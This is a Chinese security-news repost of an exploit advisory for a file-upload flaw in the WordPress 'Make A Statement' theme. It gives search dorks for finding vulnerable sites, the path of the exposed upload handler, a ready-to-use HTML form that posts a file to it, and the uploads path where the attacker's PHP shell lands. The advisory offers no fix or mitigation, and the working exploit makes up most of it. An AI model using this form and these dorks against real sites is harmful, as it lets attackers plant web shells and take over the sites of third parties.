频道栏目
首页 > 资讯 > 网站安全 > 正文

Wordpress Make A Statement (MaS)主题CSRF缺陷

13-11-21        来源:[db:作者]  
收藏   我要投稿
#标题 : Wordpress Make A Statement Themes CSRF File Upload Vulnerability
 
#作者 : DevilScreaM
 
#类型 : Web Applications
 
#Type : PHP
 
#影响版本 : 1.x.x
 
#官网 : http://themes.mas.gambit.ph/
 
#测试环境: Mozila, Chrome, Opera -> Windows & Linux
 
#缺陷类型 : CSRF
 
#关键词 : 
 
inurl:wp-content/themes/make_a_statement
inurl:wp-content/themes/make_a_statement_v1
 
 
CSRF 文件上传缺陷
 
Exploit & POC : 
 
http://site-target/wp-content/themes/make_a_statement/library/includes/upload-handler.php
 
Script :
 
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/make_a_statement/library/includes/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 
 
 
File Access :
 
http://site-target/uploads/[years]/[month]/your_shell.php
 
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

 

相关TAG标签
上一篇:Wordpress Amplus 主题CSRF文件上传缺陷
下一篇:将字符串的前N个字符平移到字符串的后面
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站